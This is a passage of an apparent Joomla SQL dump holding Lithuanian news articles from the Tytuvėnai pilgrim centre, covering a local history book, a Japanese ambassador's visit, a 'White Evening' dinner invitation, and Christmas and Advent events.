display: inline !important; float: none; background-color: #ffffff;\">...XVIII a. pirmoje pusėje dvaro valdytojas Kazimieras Zaranka 1724m. gruodžio 20 d. gavo valdovo  Augusto II privilegiją suteikiančią  teisę Tytuvėnuose rengti prekymečius...</span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Tytuvėnai: istorija, kultūra, meno paminklai      </span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Algirdas Baliulis. XVI-XIX a. Miestelio istorija.</span></span></span></p>',1,0,0,44,'2017-07-17 05:25:49',135,'','2017-07-17 05:36:19',135,0,'0000-00-00 00:00:00','2017-07-17 05:25:49','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/laiko_zenklai\\/laiko zenklai.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,0,90,'','',1,3154,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(292,381,'Mus apankė Japonijos ambasadorius','mus-apanke-japonijos-ambasadorius','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Liepos 26 d. Kelmės rajono savivaldybėje su darbiniu vizitu lankėsi Japonijos nepaprastasis ir įgaliotasis ambasadorius Lietuvoje Jo Ekscelencija ponas Toyoei Shigeeda, lydimas ambasados antrojo sekretoriaus Takahiro Hara bei politikos ir ekonomikos analitiko, vertėjo Renato Kirtiklio.</span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal width=350}stories/naujienos/japonijos_administratorius/pics{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Vizito metu ambasadorius aplankė Tytuvėnus. Labai džiaugiamės sulaukę tokio garbingo svečio.</span></span></span></p>',1,0,0,44,'2017-07-30 20:35:59',135,'','2017-07-30 20:46:12',135,0,'0000-00-00 00:00:00','2017-07-30 20:35:59','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/japonijos_administratorius\\/main\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',16,0,89,'','',1,2567,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(293,382,'Kviečiame visus į „Baltąjį vakarą“','kvieciame-visus-i-vakariene-baltas-vakaras','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Kviečiame visus į </span></span><span style=\"font-size: 12.16px;\">„</span><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Baltąjį vakarą“. Mes pasirūpinsime vakariene ir menine programa, Jūs - gera nuotaika ir balta apranga. </span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Registracija ir informacija telefonu 8 675 58506 arba atvykite į Tytuvėnų vienuolyną adresu Maironio g. 2a, Tytuvėnai.</span></span></span></span></span><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Norintiems už dalyvavimą renginyje apmokėti pavedimu, prašome pervesti lėšas į šią banko sąskaitą:</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VšĮ Tytuvėnų piligrimų centras, </span></span></span></span></span><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">LT737300010107221378</span></p>\r\n<p style=\"text-align: justify;\"><img src=\"images/balto skelbimas II.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2017-08-06 08:07:32',135,'','2018-06-28 12:48:55',135,0,'0000-00-00 00:00:00','2017-08-06 08:07:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/intro baltas.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',11,0,66,'','',1,4202,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(294,383,'Sveikiname su pasauline turizmo diena!','sveikiname-su-pasauline-turizmo-diena','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Keliaukite, pažinkite, atraskite!</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/turizmo_diena/turizmo diena.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2017-09-27 08:40:07',135,'','2017-09-27 08:40:55',135,0,'0000-00-00 00:00:00','2017-09-27 08:40:07','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/turizmo_diena\\/pasauline_diena.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,88,'','',1,2353,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(295,384,'Kalėdinis pasiūlymas','kaledinis-pasiulymas','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Kolektyvo, draugų ar artimųjų rato popietė, vakaras - tai vienas iš kalėdinių malonumų, kai gali tiesiog atsipalaiduoti, mėgautis, bendrauti. O mūsų tikslas ir pareiga - sukurti tokią atmosferą.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/del_kaledu/skelbimas_del_kaledu.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2017-11-27 19:01:26',135,'','2017-11-27 19:03:18',135,0,'0000-00-00 00:00:00','2017-11-27 19:01:26','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/del_kaledu\\/del_kaledu_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,87,'','',1,2359,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(296,385,'Kalėdų eglės įžiebimo diena','kaledu-egles-iziebimo-diena','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Kviečiame Jus visus, mažus ir didelius, į Tytuvėnų miesto Kalėdų eglės įžiebimo šventę, kuri vyks gruodžio 15 d.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><img src=\"images/stories/naujienos/egles_iziebimas/egles_iziebimas.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2017-11-27 19:26:02',135,'','2017-11-27 19:29:36',135,0,'0000-00-00 00:00:00','2017-11-27 19:26:02','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/egles_iziebimas\\/egles_iziebimas_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,86,'','',1,4649,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(297,386,'Adventinė paroda \"Dangaus ir žemės pievose\"','adventine-paroda-dangaus-ir-zemes-pievose','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Adventinė paroda \"Dangaus ir žemės pievose\". Autoriai Irena Šliuželienė ir Vilius Šliuželis. </span></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">{gallery cols=5 orientation=horizontal <span>width=500</span>}stories/naujienos/adventine_programa{/gallery}</span></span></span></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline 